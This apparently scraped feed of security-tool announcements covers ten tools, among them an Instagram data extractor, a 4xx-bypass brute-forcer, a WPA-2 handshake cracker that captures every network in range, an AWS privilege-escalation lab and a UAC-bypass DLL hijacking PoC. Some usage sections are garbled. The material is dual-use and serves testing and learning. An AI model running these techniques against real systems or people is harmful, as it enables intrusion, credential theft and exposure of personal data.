πŸ”’
There are new articles available, click to refresh the page.
Today β€” 7 December 2021Tools

Swurg - Parse OpenAPI Documents Into Burp Suite For Automating OpenAPI-based APIs Security Assessments

7 December 2021 at 11:30
By: Zion3R


Swurg is a Burp Suite extension designed for OpenAPI testing.

The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.

Use cases for machine-readable API definition documents include, but are not limited to: interactive documentation; code generation for documentation, clients, and servers; and automation of test cases. OpenAPI documents describe an API's services and are represented in either YAML or JSON formats. These documents may either be produced and served statically or be generated dynamically from an application.

- OpenAPI Initiative

Performing security assessment of OpenAPI-based APIs can be a tedious task due to Burp Suite (industry standard) lacking native OpenAPI parsing capabilities. A solution to this situation, is to use third-party tools (e.g. SOAP-UI) or to implement custom scripts (often on a per engagement basis) to handle the parsing of OpenAPI documents and integrate/chain the results to Burp Suite to use its first class scanning capabilities.

Swurg is an OpenAPI parser that aims to streamline this entire process by allowing security professionals to use Burp Suite as a standalone tool for security assessment of OpenAPI-based APIs.


Supported Features

  • OpenAPI documents can be parsed either from a supplied file or URL. The extension can fetch OpenAPI documents directly from a URL using the Send to Swagger Parser feature under the Target -> Site map context menu.
  • Parse OpenAPI documents, formerly known as the Swagger specification, fully compliant with OpenAPI 2.0/3.0 Specifications (OAS).
  • Requests can be directly viewed/edited within the extension prior to sending them to other Burp tools.
  • Requests can be sent to the Comparer, Intruder, Repeater, Scanner, Site map and Scope Burp tools.
  • Requests matching specific criterias (detailed in the 'Parameters' tab) can be intercepted to automatically match and replace the parsed parameters default values defined in the 'Parameters' tab. This feature allows for fine-tuning of the requests prior to sending them to other Burp tools (e.g., scanner). Edited requests can be viewed within the 'Modified Request (OpenAPI Parser)' tab of Burp's message editor.
  • Row highlighting allowing pentesters to highlight "interesting" API calls and/or colour code them for reporting purposes.
  • Supports both JSON and YAML formats.

Installation

Compilation

Windows & Linux

  1. Install gradle (https://gradle.org/)
  2. Download the repository.
$ git clone https://github.com/AresS31/swurg
$ cd .\swurg\
  1. Create the swurg jarfile:
$ gradle fatJar

Burp Suite settings

In Burp Suite, under the Extender/Options tab, click on the Add button and load the swurg-all jarfile.

Possible Improvements

  • Beautify the graphical user interface.
  • Deep parsing of OpenAPI schemas to collect all nested parameters along with their example/type.
  • Code simplification/refactoring.
  • Enable cells editing to change API calls directly from the GUI.
  • Further optimise the source code.
  • Implement support for authenticated testing (via user-supplied API-keys).
  • Improve the Param column by adding the type of parameters (e.g. inquery, inbody, etc.).
  • Implement the tables and context menus.
  • Increase the extension verbosity (via the bottom panel).

Dependencies

Third-party libraries

Swagger Parser:

The Swagger Parser library is required and automatically imported in this project.

Project information

In July 2016, after posting a request for improvement on the PortSwigger support forum, I decided to take the initiative and to implement a solution myself.

The extension is still in development, feedback, comments and contributions are therefore much appreciated.

One-time donation

  • Donate via Bitcoin : 15aFaQaW9cxa4tRocax349JJ7RKyj7YV1p
  • Donate via Bitcoin Cash : qqez5ed5wjpwq9znyuhd2hdg86nquqpjcgkm3t8mg3
  • Donate via Ether : 0x70bC178EC44500C17B554E62BC31EA2B6251f64B

License

Copyright (C) 2016 - 2021 Alexandre Teyar

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.



Yesterday β€” 6 December 2021Tools

STEWS - A Security Tool For Enumerating WebSockets

6 December 2021 at 20:30
By: Zion3R


STEWS is a tool suite for security testing of WebSockets

This research was first presented at OWASP Global AppSec US 2021


Features

STEWS provides the ability to:

  • Discover: find WebSockets endpoints on the web by testing a list of domains
  • Fingerprint: determine what WebSockets server is running on the endpoint
  • Vulnerability Detection: test whether the WebSockets server is vulnerable to a known WebSockets vulnerability

The included whitepaper in this repository provides further details of the research undertaken. The included slide deck was presented at OWASP AppSec US 2021.

Complementary respositories created as part of this research include:

Installation & Usage

Each portion of STEWS (discovery, fingerprinting, vulnerability detection) has separate instructions. Please see the README in each respective folder.

WebSocket Discovery

See the discovery README

WebSocket Fingerprinting

See the fingerprinting README

WebSocket Vulnerability Detection

See the vulnerability detection README

Why this tool?

WebSocket servers have been largely ignored in security circles. This is partially due to three hurdles that have not been clearly addressed for WebSocket endpoints:

  1. Discovery
  2. Enumeration/fingerprinting
  3. Vulnerability detecting

STEWS attempts to address these three points. A custom tool was required because there is a distinct lack of support for manually configured WebSocket testing in current security testing tools:

  1. There is a general lack of supported and scriptable WebSocket security testing tools (for example, NCC's unsupported wssip tool, nuclei's lack of WebSocket support, and nmap's lack of WebSocket support)
  2. Burp Suite lacks support for WebSocket extensions (for example, see this PortSwigger forum thread and this one).
  3. There is a lack of deeper WebSocket-specific security research (the Awesome WebSocket Security repository lists published WebSockets security research)
  4. The proliferation of WebSockets around the modern web (as seen in the results of the STEWS discovery tool)


Toutatis - A Tool That Allows You To Extract Information From Instagrams Accounts Such As E-Mails, Phone Numbers And More

6 December 2021 at 11:30
By: Zion3R

Toutatis is a tool that allows you to extract information from instagrams accounts such as e-mails, phone numbers and more


Prerequisite

Python 3

️
Installation

With PyPI

pip install toutatis

With Github

git clone https://github.com/megadose/toutatis.git
cd toutatis/
python3 setup.py install

ο“š
Usage:

username -s instagramsessionid ">
toutatis -u username -s instagramsessionid

ο“ˆ
Example

Email : [email protected] Public Phone : +00 0 00 00 00 00 Obfuscated email : me********[email protected] Obfuscated phone : +00 0xx xxx xx 00 ------------------------ Profile Picture : https://scontent-X-X.cdninstagram.com/ ">
Informations about     : xxxusernamexxx
Full Name : xxxusernamesxx | userID : 123456789
Verified : False | Is buisness Account : False
Is private Account : False
Follower : xxx | Following : xxx
Number of posts : x
Number of tag in posts : x
External url : http://example.com
IGTV posts : x
Biography : example biography
Public Email : [email protected]
Public Phone : +00 0 00 00 00 00
Obfuscated email : me********[email protected]
Obfuscated phone : +00 0xx xxx xx 00
------------------------
Profile Picture : https://scontent-X-X.cdninstagram.com/

ο“š
To retrieve the sessionID

Thank you to :



Before yesterdayTools

Forbidden - Bypass 4Xx HTTP Response Status Codes

5 December 2021 at 20:30
By: Zion3R


Bypass 4xx HTTP response status codes. Based on PycURL.

Script uses multithreading, and is based on brute forcing so might have some false positives. Script uses colored output.

Results will be sorted by HTTP response status code ascending, content length descending, and ID ascending.

To filter out false positives, check each content length manually with the provided cURL command. If it does not results in bypass, just ignore all other results with the same content length.


Test Scope
Various HTTP methods method
Various HTTP methods with 'Content-Length: 0' header method
Cross-site tracing (XST) with HTTP TRACE and TRACK methods method
File upload with HTTP PUT method method
Various HTTP method overrides method-override
Various HTTP headers header
Various URL overrides header
URL override with two 'Host' headers header
Various URL path bypasses path
Basic authentication/authorization including null session auth
Broken URL parser check parser

Extend this script to your liking.

Tested on Kali Linux v2021.4 (64-bit).

Made for educational purposes. I hope it will help!

Future plans:

  • add option to test only allowed HTTP methods,
  • do not ignore URL parameters and fragments.

Table of Contents

How to Run

Open your preferred console from /src/ and run the commands shown below.

Install required tools:

apt-get install -y curl  

Install required packages:

pip3 install -r requirements.txt  

Run the script:

python3 forbidden.py  

Be aware of rate limiting. Give it some time before you run the script again for the same domain in order to get better results.

Some websites require a user agent header. Download a user agent list from here.

Automation

Bypass 403 Forbidden HTTP response status code:

apt-get install -y curl

Bypass 401 Unauthorized HTTP response status code:

pip3 install -r requirements.txt

Broken URL parser check:

python3 forbidden.py

HTTP Methods

ACL  ARBITRARY  BASELINE-CONTROL  BIND  CHECKIN  CHECKOUT  CONNECT  COPY  DELETE  GET  HEAD  INDEX  LABEL  LINK  LOCK  MERGE  MKACTIVITY  MKCALENDAR  MKCOL  MKREDIRECTREF  MKWORKSPACE  MOVE  OPTIONS  ORDERPATCH  PATCH  POST  PRI  PROPFIND  PROPPATCH  PUT  REBIND  REPORT  SEARCH  SHOWMETHOD  SPACEJUMP  TEXTSEARCH  TRACE  TRACK  UNBIND  UNCHECKOUT  UNLINK  UNLOCK  UPDATE  UPDATEREDIRECTREF  VERSION-CONTROL  

HTTP Headers

Client-IP  Cluster-Client-IP  Connection  Contact  Forwarded  Forwarded-For  Forwarded-For-Ip  From  Host  Origin  Referer  Stuff  True-Client-IP  X-Client-IP  X-Custom-IP-Authorization  X-Forward  X-Forwarded  X-Forwarded-By  X-Forwarded-For  X-Forwarded-For-Original  X-Forwarded-Host  X-Forwarded-Server  X-Forward-For  X-Forwared-Host  X-Host  X-HTTP-Host-Override  X-Original-URL  X-Originating-IP  X-Override-URL  X-ProxyUser-IP  X-Real-IP  X-Remote-Addr  X-Remote-IP  X-Rewrite-URL  X-Wap-Profile  X-Server-IP  X-Target  

URL Paths

Inject to front, back, and both front and back of URL path; with and without prepending and appending slashes.

count=0; for subdomain in $(cat subdomains_403.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t method,method-override,header,path -f GET -o "forbidden_403_results_${count}.json"; done

Results Format

count=0; for subdomain in $(cat subdomains_401.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t auth -f GET -o "forbidden_401_results_${count}.json"; done

Images

Figure 1 - Help



AirStrike - Automatically Grab And Crack WPA-2 Handshakes With Distributed Client-Server Architecture

5 December 2021 at 11:30
By: Zion3R

Tool that automates cracking of WPA-2 Wi-Fi credentials using client-server architecture


Requirements

Airstrike uses Hashcat Brain Architecture, aircrack-ng suite, entr utility and some helper scripts.

You can use install.sh script to download all dependencies (if you're on system which has an access to apt or pacman, but if you're using Gentoo or Void Linux, you'd have to install hcxtools by hand, they're not available in their repos, or maybe I've missed something. Some other uncommon distros are not included, for example Alpine doesn't have hashcat package, but if you're distro is exotic, you can use Nix on that, all needed packages are in nixpkgs.)

If you're using Nix/NixOS, you can jump into Nix-Shell with needed dependencies with: nix-shell -p hashcat hashcat-utils aircrack-ng entr hcxtools

Usage

Run aircrack_server.sh on the machine on which you want to crack passwords. This script builds aircrack_client.sh file, which can be executed on any Linux host that is able to connect with the server started earlier. Upon execution, the client automatically captures handshakes, connects with the server and sends captured data.

Whenever a password is sucessfully cracked by the server, the watcher.sh script prints it out to terminal on the server side.

The only required option flag for airstrike_client.sh is the -w flag: it specifies the wordlist that should be used by the server. Listening interface can be specified with -i flag. By default, a current wireless interface is automatically selected. Additionally, airstrike_client.sh listens for WPA-2 data without any filter, so it will capture and crack all of the passwords of all Wi-Fi networks in range (whenever handshakes are exchanged).

Navigation

Ctrl + S will send capturd assets (Wi-Fi hansdhakes in .hccapx form) to the server. Ctrl + I disaplays information about capture progress.

Above shortcuts can be used inside a running instance of airstrike_client.sh

made with love by Red Code Labs <*>



IAM Vulnerable - Use Terraform To Create Your Own Vulnerable By Design AWS IAM Privilege Escalation Playground

4 December 2021 at 20:30
By: Zion3R


Use Terraform to create your own vulnerable by design AWS IAM privilege escalation playground.


IAM Vulnerable uses the Terraform binary and your AWS credentials to deploy over 250 IAM resources into your selected AWS account. Within minutes, you can start learning how to identify and exploit vulnerable IAM configurations that allow for privilege escalation.


Recommended Approach

  1. Select or create an AWS account - Do NOT use an account that has any production resources or sensitive data.
  2. Create your vulnerable playground - Use this repo to create the IAM principals and policies that support 31 unique AWS IAM privesc paths.
  3. Do your homework - Learn about the 21 original privesc paths pioneered by Spencer Gietzen.
  4. Hacky, hack - Practice exploitation in your new playground using Gerben Kleijn's guide.
  5. Level up - Run your tools against your new IAM privesc playground account (i.e., Cloudsplaining, AWSPX, Principal Mapper, Pacu).

Detailed Usage Instructions

Blog Post: IAM Vulnerable - An AWS IAM Privilege Escalation Playground

Quick Start

This quick start outlines an opinionated approach to getting IAM Vulnerable up and running in your AWS account as quickly as possible. You might have many of these steps already completed, or you might want to tweak things to work with your current configuration. Check out the Other Use Cases section in this repository for some additional configuration options.

  1. Select or create an AWS account. (Do NOT use an account that has any production resources or sensitive data!)
  2. Create a non-root user with administrative access that you will use when running Terraform.
  3. Create an access key for that user.
  4. Install the AWS CLI.
  5. Configure your AWS CLI with your newly created admin user as the default profile.
  6. Confirm your CLI is working as expected by executing aws sts get-caller-identity.
  7. Install the Terraform binary and add the binary location to your path.
  8. git clone https://github.com/BishopFox/iam-vulnerable
  9. cd iam-vulnerable/
  10. terraform init
  11. (Optional) export TF_VAR_aws_local_profile=PROFILE_IN_AWS_CREDENTIALS_FILE_IF_OTHER_THAN_DEFAULT
  12. (Optional) export TF_VAR_aws_local_creds_file=FILE_LOCATION_IF_NON_DEFAULT
  13. (Optional) terraform plan
  14. terraform apply
  15. (Optional) Add the IAM vulnerable profiles to your AWS credentials file, and change the account number.
    • The following commands make a backup of your current AWS credentials file, then takes the example credentials file from the repo and replaces the placeholder account with your target account number, and finally adds all of the IAM Vulnerable privesc profiles to your credentials file so you can use them:
    • cp ~/.aws/credentials ~/.aws/credentials.backup
    • tail -n +7 aws_credentials_file_example | sed s/111111111111/$(aws sts get-caller-identity | grep Account | awk -F\" '{print $4}')/g >> ~/.aws/credentials

Cleanup

Whenever you want to remove all of the IAM Vulnerable-created resources, you can run these commands:

  1. cd iam-vulnerable/
  2. terraform destroy

What resources were just created?

The Terraform binary just used your default AWS account profile credentials to create:

  • 31 users, roles, and policies each with a unique exploit path to administrative access of the playground account
  • Some additional users, groups, roles, and policies that are required to fully realize certain exploit paths
  • Some additional users, roles, and policies that test the detection capabilities of other tools

By default, every role created by this Terraform module is assumable by the user or role you used to run Terraform.

  • If you'd like Terraform to use a profile other than the default profile, or you'd like to hard-code the assume_role_policy ARN, see Other Use Cases.

How much is this going to cost?

Deploying IAM vulnerable in its default configuration will cost nothing. See the next section to learn how to enable non-default modules that do incur cost, and how much each module will cost per month if you deploy it.

A Modular Approach

IAM Vulnerable groups certain resources together in modules. Some of the modules are enabled by default (the ones that don't have any cost implications), and others are disabled by default (the ones that incur cost if deployed). This way, you can enable specific modules as needed.

For example, when you are ready to play with the exploit paths like ssm:StartSession that involve resources outside of IAM, you can deploy and tear down these resources on demand by uncommenting the module in the iam-vulnerable/main.tf file, and re-running terraform apply:

# Uncomment the next four lines to create an ec2 instance and related resources
#module "ec2" {
# source = "./modules/non-free-resources/ec2"
# aws_assume_role_arn = (var.aws_assume_role_arn != "" ? var.aws_assume_role_arn : data.aws_caller_identity.current.arn)
#}

After you uncomment the ec2 module, run:

terraform init
terraform apply

You have now deployed the required components to try the SSM privesc paths.

Free Resource Modules

There is no cost to anything deployed within free-resources:

Name Default Status Estimated Cost Description
privesc-paths Enabled None Contains all of the IAM privesc paths
tool-testing Enabled None Contains test cases that evaluate the capabilities of the different IAM privesc tools

Non-free Resource Modules

Deploying these additional modules can result in cost:

Name Default Status Estimated Cost Description Required for
EC2 Disabled
ο’²

$4.50/month
Creates an EC2 instance and a security group that allows SSH from anywhere ssm-SendCommand
ssm-StartSession
ec2InstanceConnect-SendSSHPublicKey
Lambda Disabled
ο™‚

Monthly cost depends on usage (cost should be zero)
Creates a Lambda function Lambda-EditExistingLambdaFunctionWithRole
Glue Disabled
ο’²
ο’²
ο’²
ο’²

$4/hour
Creates a Glue dev endpoint Glue-UpdateExistingGlueDevEndpoint
SageMaker Disabled Not sure yet Creates a SageMaker notebook sageMakerCreatePresignedNotebookURL
CloudFormation Disabled
ο™‚

$0.40/month for the secret created via CloudFormation. Nothing or barely nothing for the stack itself
Creates a CloudFormation stack that creates a secret in secret manager privesc-cloudFormationUpdateStack

Supported Privilege Escalation Paths

Path Name IAM Vulnerable Profile Name Non-Default Modules Required Exploitation References
Category: IAM Permissions on Other Users
IAM-CreateAccessKey privesc4 None
力
Well, That Escalated Quickly - Privesc 04
ο”’
s3cur3.it IAMVulnerable - Part 3
IAM-CreateLoginProfile privesc5 None
力
Well, That Escalated Quickly - Privesc 05
ο”’
s3cur3.it IAMVulnerable - Part 3
IAM-UpdateLoginProfile privesc6 None
力
Well, That Escalated Quickly - Privesc 06
ο”’
s3cur3.it IAMVulnerable - Part 3
Category: PassRole to Service
CloudFormation-PassExistingRoleToCloudFormation privesc20 None
力
Well, That Escalated Quickly - Privesc 20
CodeBuild-CreateProjectPassRole privesc-codeBuildProject None
DataPipeline-PassExistingRoleToNewDataPipeline privesc21 None
力
Well, That Escalated Quickly - Privesc 21
EC2-CreateInstanceWithExistingProfile privesc3 None
力
Well, That Escalated Quickly - Privesc 03
ο”’
s3cur3.it IAMVulnerable - Part 2
Glue-PassExistingRoleToNewGlueDevEndpoint privesc18 None
力
Well, That Escalated Quickly - Privesc 18
Lambda-PassExistingRoleToNewLambdaThenInvoke privesc15 None
力
Well, That Escalated Quickly - Privesc 15
Lambda-PassRoleToNewLambdaThenTrigger privesc16 None
力
Well, That Escalated Quickly - Privesc 16
SageMaker-CreateNotebookPassRole privesc-sageNotebook None
憐
AWS IAM Privilege Escalation - Method 2
SageMaker-CreateTrainingJobPassRole privesc-sageTraining None
SageMaker-CreateProcessingJobPassRole privesc-sageProcessing None
Category: Permissions on Policies
IAM-AddUserToGroup privesc13 None
力
Well, That Escalated Quickly - Privesc 13
IAM-AttachGroupPolicy privesc8 None
力
Well, That Escalated Quickly - Privesc 08
IAM-AttachRolePolicy privesc9 None
力
Well, That Escalated Quickly - Privesc 09
IAM-AttachUserPolicy privesc7 None
力
Well, That Escalated Quickly - Privesc 07
IAM-CreateNewPolicyVersion privesc1 None
力
Well, That Escalated Quickly - Privesc 01
ο”’
s3cur3.it IAMVulnerable - Part 1
IAM-PutGroupPolicy privesc11 None
力
Well, That Escalated Quickly - Privesc 11
IAM-PutRolePolicy privesc12 None
力
Well, That Escalated Quickly - Privesc 12
IAM-PutUserPolicy privesc10 None
力
Well, That Escalated Quickly - Privesc 10
IAM-SetExistingDefaultPolicyVersion privesc2 None
力
Well, That Escalated Quickly - Privesc 02
ο”’
s3cur3.it IAMVulnerable - Part 2
Category: Privilege Escalation using AWS Services
EC2InstanceConnect-SendSSHPublicKey privesc-instanceConnect EC2
CloudFormation-UpdateStack privesc-cfUpdateStack CloudFormation
Glue-UpdateExistingGlueDevEndpoint privesc19 Glue
力
Well, That Escalated Quickly - Privesc 19
Lambda-EditExistingLambdaFunctionWithRole privesc17 Lambda
力
Well, That Escalated Quickly - Privesc 17
ο”’
s3cur3.it IAMVulnerable - Part 4
SageMakerCreatePresignedNotebookURL privesc-sageUpdateURL Sagemaker
憐
AWS IAM Privilege Escalation - Method 3
SSM-SendCommand privesc-ssm-command EC2
SSM-StartSession privesc-ssm-session EC2
STS-AssumeRole privesc-assumerole None
Category: Updating an AssumeRole Policy
IAM-UpdatingAssumeRolePolicy privesc14 None
力
Well, That Escalated Quickly - Privesc 14

Other Use Cases

Default - No terraform.tfvars configured

  • Deploy using your default AWS profile (Default)
  • All created roles are assumable by the principal used to run Terraform (specified in your default profile)

Use a profile other than the default to run Terraform

  • Copy terraform.tfvars.example to terraform.tvvars
  • Uncomment the line #aws_local_profile = "profile_name" and enter the profile name you'd like to use
  • If you are using a non-default profile, and still want to use the aws_credentails_file_example file, you can use this command to generate an AWS credentials file that works with your non-default profile name (Thanks @scriptingislife)
    • Remember to replace nondefaultuser with the profile name you are using):
    • tail -n +7 aws_credentials_file_example | sed -e "s/111111111111/$(aws sts get-caller-identity | grep Account | awk -F\" '{print $4}')/g;s/default/nondefaultuser/g" >> ~/.aws/credentials

Use an ARN other than the caller as the principal that can assume the newly created roles

  • Copy terraform.tfvars.example to terraform.tvvars
  • Uncomment the line #aws_assume_role_arn = "arn:aws:iam::112233445566:user/you" and enter the ARN you'd like to use

Once created, each of the privesc roles will be assumable by the principal (ARN) you specified.

Create the resource in account X, but use an ARN from account Y as the principal that can assume the newly created roles

If you have configured AWS CLI profiles that assume roles into other accounts, you will want to specify the profile name AND manually specify the ARN you'd like to use to assume into the different roles.

In the example below, the resources will be created in the account that is tied to "prod-cross-org-access-role", but each role that Terraform creates can be accessed by "arn:aws:iam::112233445566:user/you", which belongs to another account.

aws_local_profile = "prod-cross-org-access-role"
aws_assume_role_arn = "arn:aws:iam::112233445566:user/you"

FAQ

How does IAM Vulnerable compare to CloudGoat, Terragoat, and SadCloud?

All of these tools use Terraform to deploy intentionally vulnerable infrastructure to AWS. However, IAM Vulnerable's focus is IAM privilege escalation, whereas the other tools either don't cover IAM privesc or only cover some scenarios.

  • CloudGoat deploys eight unique scenarios, some of which cover IAM privesc paths, while others focus on other areas like secrets in EC2 metadata.
  • Terragoat and SadCloud both focus on the many ways you can misconfigure your cloud accounts, but do not cover IAM privesc paths. In fact, you can almost think of IAM vulnerable as a missing puzzle piece when applied along side Terragoat or SadCloud. The intentionally vulnerable configurations complement each other.

How does IAM Vulnerable compare to Cloudsplaining, AWSPX, Principal Mapper, Pacu, Cloudmapper, or ScouteSuite?

All of these tools help identify existing misconfigurations in your AWS environment. Some, like Pacu, also help you exploit misconfigurations. In contrast, IAM Vulnerable creates intentionally vulnerable infrastructure. If you really want to learn how to use tools like Principal Mapper (PMapper), AWSPX, Pacu, and Cloudsplaining, IAM Vulnerable is for you.

I've never used Terraform and I'm afraid of it. Help!?

I was also afraid of Terraform and projects that would create resources in my account before I knew how Terraform worked. Here are some things that might ease your anxiety:

  • By using an AWS account for this single purpose, you can rest assured that this repository won't negatively impact anything else you care about. Even if you deploy IAM Vulnerable to a separate account in an AWS organization, you can rest assured that the other accounts in the org will be outside the blast radius of this playground account.
  • The terraform plan command is a dry run. It shows you exactly what will be deployed if you run terraform apply before you actually run it.
  • Rest assured knowing that you can terraform destroy anything you terraform apply for a clean slate.
  • If your concern is cost, check out Infracost. You download this binary, register for a free API key, and execute it within a Terraform directory like iam-vulnerable. This tool runs terraform plan and calculates the monthly cost associated with the plan as it is currently configured. This is the tool I used to populate the module cost estimates table above.

Can I run this tool and another tool like CloudGoat, Terragoat, or SadCloud in the same AWS account?

Yes. Each tool will keep its Terraform state separately, but all resources will be created, updated, and deleted in the same account, and they can coexist.

Prior work and good references



DLLHijackingScanner - This Is A PoC For Bypassing UAC Using DLL Hijacking And Abusing The "Trusted Directories" Verification

4 December 2021 at 11:30
By: Zion3R


This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.


Generate Header from CSV

The python script CsvToHeader.py can be used to generate a header file. By default it will use the CSV file dll_hijacking_candidates.csv that can be found here: dll_hijacking_candidates.csv.

The script will check for each portable executable(PE) the following condition:

  • If the PE exists in the file system.
  • In the manifest of the PE, if the requestedExecutionLevel is set to one of the following values:
    • asInvoker
    • highestAvailable
    • requireAdministrator
  • In the manifest if the autoElevate is set to true:
    <autoElevate>true</autoElevate>
  • If the user specified the -c argument, the script will check if the DLL to hijack is in the list of DLLs imported form PE table.

Arguments

> python .\CsvToHeader.py -h
usage: CsvToHeader.py -f [DLL_PATH] -c

CsvToHeader can be used to generate a header file from a CSV.

optional arguments:
-h, --help show this help message and exit
-f [DLL_PATH] Path of the csv to convert (default="dll_hijacking_candidates.csv")
-c Enable import dll in PE (default=False)
-v, --version Show program's version number and exit

To generate the header file you can use the following command:

python CsvToHeader.py > dll_hijacking_candidates.h

Generate the list of vulnerable PE and DLL

The files that will be used are DLLHijacking.exe and test.dll.

DLLHijacking.exe

DLLHijacking.exe is the file that will be used to generate the list of vulnerable PE. It will perform the following steps:

  1. CreateFakeDirectory

    Function that create a directory in C:\windows \system32.

  2. Copy Files in the new directory

    • from C:\windows\system32\[TARGET.EXE] to C:\windows \system32\[TARGET.EXE]
    • from [CUSTOM_DLL_PATH] to C:\windows \system32\[TARGET.DLL]
  3. Trigger

    Run the executable from C:\windows \system32\[TARGET.EXE]

  4. CleanUpFakeDirectory

    Function that delete the directory created in step 1 and files from step 2.

  5. CheckExploit

    Check the content of the file C:\ProgramData\exploit.txt to see if the exploit was successful.

Log file

DLLHijacking.exe will always generate a log file exploitable.log with the following content:

  • 0 or 1 to indicates whether the exploit was able to bypass the UAC.
  • The executable name
  • The dll name

E.g.

1,computerdefaults.exe,PROPSYS.dll
0,computerdefaults.exe,Secur32.dll

Execution

Command to run:

DLLHijacking.exe [DLL_PATH]

if no argument is passed, the script will use the DLL test.dll which is stored in the resouce of DLLHijacking.exe.

Result

Tested on Windows 10 Pro (10.0.19043 N/A Build 19043).

test.dll

test.dll is a simple dynamic library that will be use to see if the exploit is successfully. The DLL will create a file C:\ProgramData\exploit.txt with the following content:

  • 0 or 1 to indicates whether the exploit was able to bypass the UAC.
  • The executable name
  • The DLL name

This file will be deleted once the exploit is complete.

Sources:

Legal Disclaimer:

This project is made for educational and ethical testing purposes only. Usage of this software for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.


IDA2Obj - Static Binary Instrumentation

3 December 2021 at 20:30
By: Zion3R


IDA2Obj is a tool to implement SBI (Static Binary Instrumentation).

The working flow is simple:

  • Dump object files (COFF) directly from one executable binary.
  • Link the object files into a new binary, almost the same as the old one.
  • During the dumping process, you can insert any data/code at any location.
    • SBI is just one of the using scenarios, especially useful for black-box fuzzing.

How to use

  1. Prepare the enviroment:

    • Set AUTOIMPORT_COMPAT_IDA695 = YES in the idapython.cfg to support the API with old IDA 6.x style.
    • Install dependency: pip install cough
  2. Create a folder as the workspace.

  3. Copy the target binary which you want to fuzz into the workspace.

  4. Load the binary into IDA Pro, choose Load resources and manually load to load all the segments from the binary.

  5. Wait for the auto-analysis done.

  6. Dump object files by running the script MagicIDA/main.py.

    • The output object files will be inside ${workspace}/${module}/objs/afl.
    • If you create an empty file named TRACE_MODE inside the workspace, then the output object files will be inside ${workspace}/${module}/objs/trace.
    • By the way, it will also generate 3 files inside ${workspace}/${module} :
      • exports_afl.def (used for linking)
      • exports_trace.def (used for linking)
      • hint.txt (used for patching)
  7. Generate lib files by running the script utils/LibImports.py.

    • The output lib files will be inside ${workspace}/${module}/libs, used for linking later.
  8. Open a terminal and change the directory to the workspace.

  9. Link all the object files and lib files by using utils/link.bat.

    • e.g. utils/link.bat GdiPlus dll afl /RELEASE
    • It will generate the new binary with the pdb file inside ${workspace}/${module}.
  10. Patch the new built binary by using utils/PatchPEHeader.py.

    • e.g. utils/PatchPEHeader.py GdiPlus/GdiPlus.afl.dll
    • For the first time, you may need to run utils/register_msdia_run_as_administrator.bat as administrator.
  11. Run & Fuzz.

More details

HITB Slides : https://github.com/jhftss/jhftss.github.io/blob/main/res/slides/HITB2021SIN%20-%20IDA2Obj%20-%20Mickey%20Jin.pdf

Demo : https://drive.google.com/file/d/1N3DXJCts5jG0Y5B92CrJOTIHedWyEQKr/view?usp=sharing



ClusterFuzzLite - Simple Continuous Fuzzing That Runs In CI

3 December 2021 at 11:30
By: Zion3R


ClusterFuzzLite is a continuous fuzzing solution that runs as part of Continuous Integration (CI) workflows to find vulnerabilities faster than ever before. With just a few lines of code, GitHub users can integrate ClusterFuzzLite into their workflow and fuzz pull requests to catch bugs before they are committed.

ClusterFuzzLite is based on ClusterFuzz.


Features

  • Quick code change (pull request) fuzzing to find bugs before they land
  • Downloads of crashing testcases
  • Continuous longer running fuzzing (batch fuzzing) to asynchronously find deeper bugs missed during code change fuzzing and build a corpus for use in code change fuzzing
  • Coverage reports showing which parts of your code are fuzzed
  • Modular functionality, so you can decide which features you want to use


Supported Languages

  • C
  • C++
  • Java (and other JVM-based languages)
  • Go
  • Python
  • Rust
  • Swift

Supported CI Systems

  • GitHub Actions
  • Google Cloud Build
  • Prow
  • Support for more CI systems is in-progess, and extending support to other CI systems is easy

Documentation

Read our detailed documentation to learn how to use ClusterFuzzLite.

Staying in touch

Join our mailing list for announcements and discussions.

If you use ClusterFuzzLite, please fill out this form so we know who is using it. This gives us an idea of the impact of ClusterFuzzLite and allows us to justify future work.

Feel free to file an issue if you experience any trouble or have feature requests.



Crawpy - Yet Another Content Discovery Tool

2 December 2021 at 20:30
By: Zion3R


Yet another content discovery tool written in python.

What makes this tool different than others:

  • It is written to work asynchronously which allows reaching to maximum limits. So it is very fast.
  • Calibration mode, applies filters on its own
  • Has bunch of flags that helps you fuzz in detail
  • Recursive scan mode for given status codes and with depth
  • Report generations, you can later go and check your results
  • Multiple url scans

An example run

Yet another content discovery tool (1)

An example run with auto calibration and recursive mode enabled

Yet another content discovery tool (2)

Example reports

Example reports can be found here

https://morph3sec.com/crawpy/example.html
https://morph3sec.com/crawpy/example.txt

Installation

git clone https://github.com/morph3/crawpy
pip3 install -r requirements.txt
or
python3 -m pip install -r requirements.txt

Usage

Max retry -H HEADERS, --headers HEADERS Headers, you can set the flag multiple times.For example: -H "X-Forwarded-For: 127.0.0.1", -H "Host: foobar" -o OUTPUT_FILE, --output OUTPUT_FILE Output folder -gr, --generate-report If you want crawpy to generate a report, default path is crawpy/reports/<url>.txt -l URL_LIST, --list URL_LIST Takes a list of urls as input and runs crawpy on via multiprocessing -l ./urls.txt -lt LIST_THREADS, --list-threads LIST_THREADS Number of threads for running crawpy parallely when running with list of urls -s, --silent Make crawpy not produce output -X HTTP_METHOD, --http-method HTTP_METHOD HTTP request method -p PROXY_SERVER, --proxy PROXY_SERVER Proxy server, ex: 'http://127.0.0.1:8080' ">
morph3 ➜ crawpy/ [mainβœ—] Ξ» python3 crawpy.py --help
